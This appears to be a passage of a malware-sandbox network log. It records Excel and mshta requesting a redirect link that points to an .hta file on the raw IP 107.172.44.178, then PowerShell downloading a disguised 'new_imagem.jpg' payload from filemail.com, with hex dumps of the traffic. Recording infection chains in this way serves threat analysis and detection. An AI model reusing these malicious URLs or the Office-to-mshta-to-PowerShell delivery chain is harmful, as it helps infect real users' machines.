                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:21:30 UTC616INHTTP/1.1 302 Found
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:30 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 121
                                                                                                                                                  Connection: close
                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                  Location: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                  Vary: Accept
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  2024-11-18 17:21:30 UTC121INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 38 2f 35 33 2f 63 67 2f 62 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 67 65 74 62 65 73 72 65 6e 74 69 72 65 6c 69 66 65 74 68 69 6e 67 73 74 6f 67 64 6f 6d 79 62 65 74 74 65 72 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 2e 68 74 61
                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.22491635.45.108.484433544C:\Windows\System32\mshta.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:21:32 UTC415OUTGET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: link.uebie.de
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:21:32 UTC616INHTTP/1.1 302 Found
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:32 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 121
                                                                                                                                                  Connection: close
                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                  Location: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                  Vary: Accept
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  2024-11-18 17:21:32 UTC121INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 38 2f 35 33 2f 63 67 2f 62 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 67 65 74 62 65 73 72 65 6e 74 69 72 65 6c 69 66 65 74 68 69 6e 67 73 74 6f 67 64 6f 6d 79 62 65 74 74 65 72 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 2e 68 74 61
                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.2249166142.215.209.784432104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:21:54 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                                                  Host: 1017.filemail.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:21:54 UTC324INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 2230233
                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                  Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                                                  X-Transfer-ID: wxhdiueivoluihj
                                                                                                                                                  Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:53 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  2024-11-18 17:21:54 UTC2539INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                  2024-11-18 17:21:54 UTC8192INData Raw: 2c 06 20 df 5c f4 5e 33 e0 b1 78 9c 2d a7 9d 59 62 3e d8 3f b3 fe 0b 07 80 68 46 9a 01 60 b1 6d c4 73 80 8f d9 f6 30 7e d5 7e d2 18 d4 22 2e 96 11 43 a8 1b 12 b3 37 c4 de 6d 57 db 19 34 ef fb a8 e4 f1 66 67 70 d4 db be e8 a1 7e 34 c3 71 cb f8 33 b7 ff 00 75 6f 1f 9d 1a 80 d3 22 15 3d f8 8f 9f a6 d3 8b eb 75 25 3e dc 47 1b 10 37 f8 ae fd ec 3d 5f fd 8a 82 af a5 7a b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31 ef b0 9f 66 e5 56 3e 29 ad 2e b3 ee 23 6b 5d 91 ef 8f 7d b6 3b 7e d3 fd 99 2c a0 de a4 02 48 e8 3c c8 b9 fd 2b 3d bb ec 8d 18 91 c0 14 68 7f 2c 07 62 d7 b9 50 09 0c 17 b8 3d 46 5b ef 85 1c b2 38 dc d5 6b 7c 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d
                                                                                                                                                  Data Ascii: , \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3uo"=u%>G7=_z0bxxZx|{e1fV>).#k]};~,H<+=h,bP=F[8k|"t-&/{mO| m
                                                                                                                                                  2024-11-18 17:21:54 UTC8192INData Raw: dd a3 69 e0 81 80 b4 bb d5 b9 21 af 06 01 62 0d 0f cf 1d 4d 23 b8 65 28 d4 bc 0f 8e 0d f4 cf 13 1b 8d a8 0c 01 02 0c 4c a1 45 df 5c 09 14 79 c7 a4 45 83 61 11 93 bc 6e c5 64 52 18 92 b5 b8 d8 17 80 2a c6 b4 b1 99 37 25 75 ca e9 e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61 01 5d c0 f3 d7 34 a4 68 e7 76 21 29 82 51 23 bf 3d 71 72 10 25 94 e5 4e db 27 ae 06 49 82 47 8c ca 5b 75 7b 0e 41 c2 e8 d6 4d 42 3c 21 a8 8e 6c 9a fa 73 8d e8 b4 52 3e aa 43 11 21 36 12 79 b1 78 d3 e9 a3 8a 24 da a1 58 b6 e2 c7 8b 15 fd eb 00 6a 87 4f 11 0c bc 7e 10 6b 9f 9e 20 ec ab 21 3c
                                                                                                                                                  Data Ascii: i!bM#e(LE\yEandR*7%ugmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: 01 07 2c c3 d2 a0 0d a3 28 c4 c6 a5 c4 4e c6 c2 9d bd 4f 38 c4 70 29 66 91 63 60 58 5b 5f 7c e3 26 d1 75 c5 50 18 19 fa b1 a4 69 94 f9 32 09 d0 12 c0 2f 0c 2b 8b c4 f5 7a 38 27 89 de 3d 30 69 5b e3 ca f1 ed 9b f0 c7 68 f2 79 45 b7 f3 c7 c0 e2 5a f9 d6 1d 36 d0 8e ac 0e ef 4d 5d 76 c0 ca f0 9d 1c 7a 4f 14 d2 c4 ed 73 95 2c 4f f8 7d 2d fd b3 d4 c4 cf 26 9d de 66 20 ab 12 0f 4e 33 cd 78 76 ad e7 f1 18 5e 54 6b 24 ae e3 d3 a1 eb 9e 8b 50 ae 63 6f 2c da b2 95 e7 b6 00 60 9d f5 b0 4f 1a 3f 97 21 6a 46 6e e3 3c b6 a3 57 ad d1 6b 0c 33 3b 20 56 ea 7a 37 39 bd a0 d1 cb a6 12 1d e5 94 35 ad 9e 98 97 8e 46 d3 e8 d8 be d2 ea f4 19 ba 8c 0c 2f 17 97 ef 1e 27 24 80 d9 60 bc 8f 7d a0 7f 43 83 80 c2 75 71 19 14 85 f3 63 b5 3f e1 1f 8b 05 1c 8f a3 d4 ab ed 05 94 82 03 74
                                                                                                                                                  Data Ascii: ,(NO8p)fc`X[_|&uPi2/+z8'=0i[hyEZ6M]vzOs,O}-&f N3xv^Tk$Pco,`O?!jFn<Wk3; Vz795F/'$`}Cuqc?t
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: c9 e5 58 af cc 03 86 3a c9 83 17 f3 03 12 14 10 ca 0d d0 e3 8c 59 9c c8 cd 64 96 63 64 93 d4 e0 51 48 0c 2f a0 cd 4d 3e 8c 6b 5d 3c b7 50 cc c3 d2 48 15 c7 c7 33 50 ec 70 dd 6b 36 34 8e 4c aa e8 42 fa a3 e8 4d 8f 49 be d8 06 1b 3c a5 69 91 54 af a4 95 37 b8 5f 04 f3 8b 6b a2 02 64 a3 4b d8 91 d3 e9 96 4a 58 4b 79 ac 15 40 24 df 3d 7e 23 29 20 fb c2 a5 b9 a6 70 ad 62 88 3f d7 00 2f 0a c0 4a f9 85 9c a9 53 c7 e1 3d 70 02 0d ac 40 e7 a7 27 db 2d 2f 96 aa c1 0b 07 56 3b ac f0 d7 9c ec cc 1c 79 85 8a d1 f6 b1 58 01 54 69 5c db 50 b3 c9 3d 32 bb 0e e0 07 3c d6 50 80 00 e6 ec 5e 12 30 80 8d cc 41 f6 18 04 11 9b db 77 87 8d 12 32 77 28 dc 3d f3 83 aa 21 21 03 00 38 6c 55 6e 76 b7 63 c6 06 80 9b 7b 04 15 43 b9 39 c6 42 a0 a9 01 81 e9 66 eb 33 a5 4f 2d e8 58 f8 e4
                                                                                                                                                  Data Ascii: X:YdcdQH/M>k]<PH3Ppk64LBMI<iT7_kdKJXKy@$=~#) pb?/JS=p@'-/V;yXTi\P=2<P^0Aw2w(=!!8lUnvc{C9Bf3O-X
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: 1f 69 75 8c 48 f2 e1 00 7b ab 7f ea cc 42 5a 3a 28 c2 ba 10 72 ea ca 58 75 b3 f9 60 6d 0f 1d d4 b8 63 b2 05 50 38 01 5b 9f fc 58 6d 5f 8b ea 56 14 6a 8b 6f 5a da dd 6b fd ec c2 de a7 83 84 d5 ea 12 58 d1 0d d2 fb 60 6a 45 e3 5a 93 15 85 89 7e 1b 5b 9f d7 05 ff 00 c4 5a c8 9a 8c 70 8f 9a b7 3f ae 66 a1 60 a1 d0 31 5e d7 95 91 83 7e 21 47 df 03 5c fd a4 d6 37 58 74 d7 d8 ed 6b ff 00 cd 99 5a 9d 42 ce ed 23 46 aa 5b f1 6d ba 27 df 92 70 61 2a 2b dd 67 b6 0a 6b 11 30 3d eb f9 e0 54 4e 88 0d 7a 89 ca c7 3b 33 ed 23 86 e3 07 14 5e 63 10 4d 57 be 11 f4 bb 3a ba ee 3d 00 c0 d3 84 8d 62 a6 8e 46 55 97 a4 32 1e ab fe 56 f8 1e df 1a c4 25 32 46 de 53 f2 63 24 1f 81 07 90 30 cb 0e c8 02 96 b2 dc df b6 39 e2 a8 67 4d 3e b4 70 66 8c 07 0d d4 b2 f0 c7 f9 60 66 97 79 58
                                                                                                                                                  Data Ascii: iuH{BZ:(rXu`mcP8[Xm_VjoZkX`jEZ~[Zp?f`1^~!G\7XtkZB#F[m'pa*+gk0=TNz;3#^cMW:=bFU2V%2FSc$09gM>pf`fyX
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: 6c 71 f8 b1 f3 f6 41 15 09 1a d2 19 89 24 98 f8 e7 fe 2c ca 4f b4 88 fa f4 69 b4 f1 ab 21 25 49 70 78 26 88 fc 37 5c ee e2 bf 0f d3 17 f1 7f b6 fe 25 0c cb 14 0d a4 23 6e e2 ea 8d d4 9e 9e aa e9 f2 c0 d0 8b ec e2 6a a4 95 13 5e 08 8d b6 86 10 d8 35 d4 83 ba b8 36 3e 04 66 80 fb 11 a7 a8 a5 6d 7c a2 3a da ca 10 6e 2d 47 90 7b 7e 47 3c b7 87 fd b2 d5 a6 a2 41 21 d1 42 8e db c8 68 98 aa 9f e2 00 2d 9f 51 25 8f c6 f3 7e 2f b6 0f 24 71 a0 d5 f8 63 11 d4 04 99 5a ab 8a f4 9e 87 01 6f b4 be 11 e1 5e 09 e1 32 c9 b1 a6 92 40 a8 8a ee 78 20 75 e2 bd f0 bf 65 3e cd 45 0e 88 6a b5 9a 74 92 49 79 02 54 0d 43 e1 77 98 9f 68 bc 62 2f 18 f1 5d 34 46 48 3c b5 23 71 0d 21 5b f7 36 a0 f5 f6 19 bb 0f da 6d 4e 97 4e b1 8d 67 86 34 68 28 83 1c d7 43 b7 e1 c0 db d4 f8 32 aa 7f
                                                                                                                                                  Data Ascii: lqA$,Oi!%Ipx&7\%#nj^56>fm|:n-G{~G<A!Bh-Q%~/$qcZo^2@x ue>EjtIyTCwhb/]4FH<#q![6mNNg4h(C2
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: 38 23 4a c0 ef be 7d b1 b4 2c 61 20 74 ea 6b 01 27 4a 60 a1 79 ef 96 2c 7d 23 6f 00 59 18 f5 22 c3 b9 56 df 16 30 1d bc 35 92 6f fe 98 00 2e 59 85 70 07 4c 32 15 5e 88 6f f8 58 0e 0e 0d a2 da dc 91 cf 51 8c e9 ca 83 19 91 bd 1b 49 f6 a3 78 05 2a 59 95 c4 65 5c 0f 50 ae 0f 18 67 54 3a 6b 0a 43 b7 6e e7 2b 33 bc 4c 5e 36 dd b8 5f 1c f1 82 4d 5a 3a 94 92 3d a6 ef 77 5a c0 4d 96 40 e1 c8 22 8f 52 33 5e 27 f3 21 d9 18 62 c4 75 3d b3 37 52 e0 c6 42 22 95 bb 0c 07 39 48 f5 93 47 d0 90 0f b6 03 fb 25 da 54 b9 a5 e4 df 19 d2 38 30 87 95 d4 b0 fc 23 07 a6 d4 34 ed 27 9c d6 08 ae bc e2 8c 8d e6 ec 76 24 5f 03 00 e9 2b ca f7 e9 a5 3e 91 8e c5 12 82 cf 22 06 2c 39 2b db 05 a4 58 e1 05 59 14 1b e2 fa e6 a6 9e 15 92 23 b8 10 4f 00 2f 71 81 9b 2b c7 05 8d c1 55 ba 8e bc
                                                                                                                                                  Data Ascii: 8#J},a tk'J`y,}#oY"V05o.YpL2^oXQIx*Ye\PgT:kCn+3L^6_MZ:=wZM@"R3^'!bu=7RB"9HG%T80#4'v$_+>",9+XY#O/q+U
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: 0d b4 0a 92 ed 6d 5b b6 d0 07 bd 58 0c 6b 9a 62 3b 60 23 d2 bc 88 ac bb 44 6d 62 c9 00 02 2b f1 13 40 75 19 03 4f 21 12 7a 05 46 00 66 24 50 b0 6b 9e 95 80 e4 92 e9 18 c8 a3 ca 4a d3 ed 04 2b 51 70 f6 6a ec f2 01 16 79 e7 29 aa 7d 33 ee 78 96 25 2c fb 82 a2 b5 a8 37 c1 be 2f a7 4c 5a 68 9e 16 3e 64 61 68 d1 00 8e 3d b8 be 32 a1 b7 b0 55 51 67 a0 3d f0 2f a7 2a 24 0c 58 a8 a2 2c 13 dc 11 cd 76 f7 f8 5e 68 7d e6 35 88 ac 72 6c 5f bb f9 67 6d d6 ed f6 6a fe 17 d7 32 84 12 34 42 40 14 0e 48 05 80 26 8f 34 3a 9c 1a b0 0b 43 92 dc fc b0 34 f5 3a 94 10 33 47 29 df 71 ed bf 75 5a 3f cf 14 7d 53 b4 f2 ea 03 d3 39 63 7f ef 58 3f a1 39 4a 12 a0 55 04 d7 26 bd 87 27 2c f1 88 89 08 6e 89 20 86 04 57 1d fb f5 ed 81 54 08 c4 29 70 b6 40 dc 6f a7 d2 f2 58 42 b3 85 56 12
                                                                                                                                                  Data Ascii: m[Xkb;`#Dmb+@uO!zFf$PkJ+Qpjy)}3x%,7/LZh>dah=2UQg=/*$X,v^h}5rl_gmj24B@H&4:C4:3G)quZ?}S9cX?9JU&',n WT)p@oXBV
                                                                                                                                                  2024-11-18 17:21:55 UTC8192INData Raw: e9 cf 41 f9 60 12 26 24 00 a0 fd 31 83 1c 8c 95 b4 a8 1d 41 e8 70 00 5d de 67 58 90 3a 01 c0 6e c4 73 7f a6 71 78 a5 01 1a 2d 8d 56 42 8a e7 e1 86 8a 12 84 9a 20 9c a9 88 99 37 b7 22 ee c6 00 c6 9e 5f bb 28 2e c5 8b 7a 40 36 70 b0 ab bc b1 c2 5b d4 0b 7a 88 eb 78 c4 0d 72 2b 46 ca ac aa 54 06 07 be 40 d2 56 a8 53 82 6f a1 27 8c 03 19 6a 65 2c 69 8b ec 23 e0 06 1d a4 0a 36 16 0a 84 10 5a b9 07 b6 55 a0 24 f9 b2 d9 0a 79 00 73 ed 7f 1c 95 8d 9e 59 15 56 96 81 56 61 c1 04 57 4c 0c ff 00 13 9e 51 e5 02 77 46 56 98 a8 e1 be 38 ac a2 99 d2 95 4b 05 a5 51 57 9b 3a 9d 2b 34 2b 19 6b 01 40 6b 18 8b e9 01 93 7b 29 63 6a b4 79 3e d8 09 78 7c 86 39 0f 27 71 0d 6b d7 b1 c8 81 1d 57 78 6b 79 14 b3 5f 63 d3 26 5d 39 d3 ea 51 85 8b 62 2a eb 0b fe ce 9a 69 0b 35 a2 f2 78
                                                                                                                                                  Data Ascii: A`&$1Ap]gX:nsqx-VB 7"_(.z@6p[zxr+FT@VSo'je,i#6ZU$ysYVVaWLQwFV8KQW:+4+k@k{)cjy>x|9'qkWxky_c&]9Qb*i5x


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.22491675.45.108.484433224C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:21:56 UTC391OUTGET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: link.uebie.de
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:21:56 UTC616INHTTP/1.1 302 Found
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:56 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 121
                                                                                                                                                  Connection: close
                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                  Location: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                  Vary: Accept
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  2024-11-18 17:21:56 UTC121INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 38 2f 35 33 2f 63 67 2f 62 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 67 65 74 62 65 73 72 65 6e 74 69 72 65 6c 69 66 65 74 68 69 6e 67 73 74 6f 67 64 6f 6d 79 62 65 74 74 65 72 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 2e 68 74 61
                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.22491705.45.108.484431264C:\Windows\System32\mshta.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:21:58 UTC415OUTGET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: link.uebie.de
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:21:58 UTC616INHTTP/1.1 302 Found
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:58 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 121
                                                                                                                                                  Connection: close
                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                  Location: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                  Vary: Accept
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                  X-Served-By: link.uebie.de
                                                                                                                                                  2024-11-18 17:21:58 UTC121INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 38 2f 35 33 2f 63 67 2f 62 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 67 65 74 62 65 73 72 65 6e 74 69 72 65 6c 69 66 65 74 68 69 6e 67 73 74 6f 67 64 6f 6d 79 62 65 74 74 65 72 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 2e 68 74 61
                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.2249173142.215.209.784433836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:22:17 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                                                  Host: 1017.filemail.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-18 17:22:17 UTC324INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 2230233
                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                  Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                                                  X-Transfer-ID: wxhdiueivoluihj
                                                                                                                                                  Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:22:16 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  2024-11-18 17:22:17 UTC2499INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
